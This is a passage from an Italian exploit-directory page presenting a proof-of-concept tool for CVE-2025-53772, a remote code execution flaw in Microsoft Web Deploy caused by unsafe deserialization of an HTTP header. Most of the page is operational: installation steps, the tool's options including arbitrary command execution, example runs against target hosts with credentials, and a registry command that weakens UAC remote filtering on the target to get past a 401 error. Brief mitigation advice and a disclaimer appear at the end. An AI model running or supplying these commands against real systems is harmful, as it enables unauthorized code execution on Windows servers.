Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-53772 — poc per cve-2025-53772 | Kitploit
Strumenti/GitHubGitHub/sailay1996/cve-2025-53772
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubsailay1996/cve-2025-53772

CVE-2025-53772

poc per cve-2025-53772

Vedi Repository
4611469 mesi faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-53772 - Exploit RCE di Microsoft Web Deploy

Un exploit basato su Python per CVE-2025-53772, una vulnerabilità di esecuzione remota di codice in Microsoft Web Deploy (msdeploy) causata dalla deserializzazione non sicura dei dati dell'header HTTP.

🎬 POC Video

POC


Panoramica della Vulnerabilità

Scarica lo strumento
ProprietàValore
ID CVECVE-2025-53772
Punteggio CVSS8.8 (Alto)
Prodotto interessatoMicrosoft Web Deploy 4.0
Versioni vulnerabili< 10.0.2001
Versione patchata10.0.2001+
Tipo di vulnerabilitàDeserializzazione di dati non attendibili (CWE-502)
AutenticazioneRichiesta (privilegi bassi)

Come Funziona

La vulnerabilità risiede nella deserializzazione dell'header HTTP MSDeploy.SyncOptions. Quando viene inviato un payload appositamente predisposto, il server lo deserializza tramite BinaryFormatter, innescando l'esecuzione di codice arbitrario attraverso la catena di gadget TypeConfuseDelegate.

root@kitploit:~
Attacker                                    Target Server
   │                                              │
   │  POST /MSDEPLOYAGENTSERVICE HTTP/1.1         │
   │  MSDeploy.SyncOptions: <malicious_payload>   │
   │─────────────────────────────────────────────>│
   │                                              │
   │                            BinaryFormatter.Deserialize()
   │                                     │
   │                                     ▼
   │                            Process.Start("cmd.exe", "/c ...")
   │                                     │
   │                                     ▼
   │                              RCE Achieved!

Endpoint interessati

EndpointPortaProtocolloTipo di autenticazione
/MSDEPLOYAGENTSERVICE80HTTPNTLM
/msdeploy.axd8172HTTPSBasic

Installazione

root@kitploit:~
git clone https://github.com/sailay1996/CVE-2025-53772.git
cd CVE-2025-53772
pip install -r requirements.txt

Requisiti

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
requests-ntlm>=1.2.0

Utilizzo

Avvio rapido

root@kitploit:~
# Create proof file in C:\Windows\Temp\pwned.txt
python3 CVE-2025-53772.py -t <TARGET_IP> -u "<DOMAIN\username>" -P "<password>" --ntlm --proof-temp

CVE-2025-53772.py

Opzioni

root@kitploit:~
-t, --target      Target IP or hostname (required)
-u, --user        Username (required)
-P, --password    Password (required)
--port            Target port (default: 80)
--endpoint        Endpoint path (default: /MSDEPLOYAGENTSERVICE)
--ntlm            Use NTLM authentication (required for Agent Service)
--calc            Execute calc.exe
--proof-temp      Create C:\Windows\Temp\pwned.txt
--proof-web       Create C:\inetpub\wwwroot\pwned.txt
-c, --command     Custom command to execute
--generate-only   Only generate payload, don't send
-o, --output      Save payload to file

Esempi

Agent Service (Porta 80 - Autenticazione NTLM)

root@kitploit:~
# Pop calculator
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\Administrator" -P "P@ssw0rd" --ntlm --calc

# Create proof file in temp folder
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\webdeploy" -P "Password123" --ntlm --proof-temp

# Create proof file in webroot (verify via browser)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm --proof-web

# Execute custom command
python3 CVE-2025-53772.py -t 192.168.1.100 -u "WORKSTATION\admin" -P "Password123" --ntlm -c "whoami > C:\Windows\Temp\whoami.txt"

# Generate payload only (don't send)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "test" -P "test" --generate-only --proof-temp -o payload.txt

Servizio WMSvc (Porta 8172 - Autenticazione Basic)

root@kitploit:~
# Using msdeploy.axd endpoint (no --ntlm flag)
python3 CVE-2025-53772.py -t 192.168.1.100 -u "webdeploy" -P "Password123" --port 8172 --endpoint "/msdeploy.axd" --proof-temp

Verifica

Dopo aver eseguito l'exploit, verifica l'esecuzione sul target:

root@kitploit:~
# Check for proof file
type C:\Windows\Temp\pwned.txt

# Or via browser (if --proof-web was used)
# Navigate to: http://<TARGET>/pwned.txt

Problemi comuni

401 Non autorizzato (NTLM)

Se utilizzi il servizio Agent con NTLM e ricevi un 401:

root@kitploit:~
# On target, disable UAC remote filtering:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

404 Non trovato (msdeploy.axd)

Il gestore IIS potrebbe non essere registrato. Usa invece l'endpoint di Agent Service:

root@kitploit:~
--port 80 --endpoint "/MSDEPLOYAGENTSERVICE"

Verificare la versione vulnerabile

root@kitploit:~
# Check installed version
(Get-Command msdeploy.exe).FileVersionInfo.FileVersion
# Vulnerable if < 10.0.2001

Mitigazione

  1. Aggiorna Web Deploy alla versione 10.0.2001 o successiva
  2. Limita l'accesso agli endpoint di Web Deploy tramite firewall
  3. Usa credenziali forti ed evita il riutilizzo delle password
  4. Monitora i log per attività sospette sulle porte 80/8172
  5. Disattiva Web Deploy se non necessario

Riferimenti

  • Avviso di sicurezza Microsoft
  • NVD - CVE-2025-53772
  • Ricerca originale di HawkTrace

Disclaimer

Questo strumento è fornito esclusivamente per test di sicurezza autorizzati e scopi educativi. L'accesso non autorizzato ai sistemi informatici è illegale. Ottieni sempre la dovuta autorizzazione prima di eseguire i test.


Licenza

Licenza MIT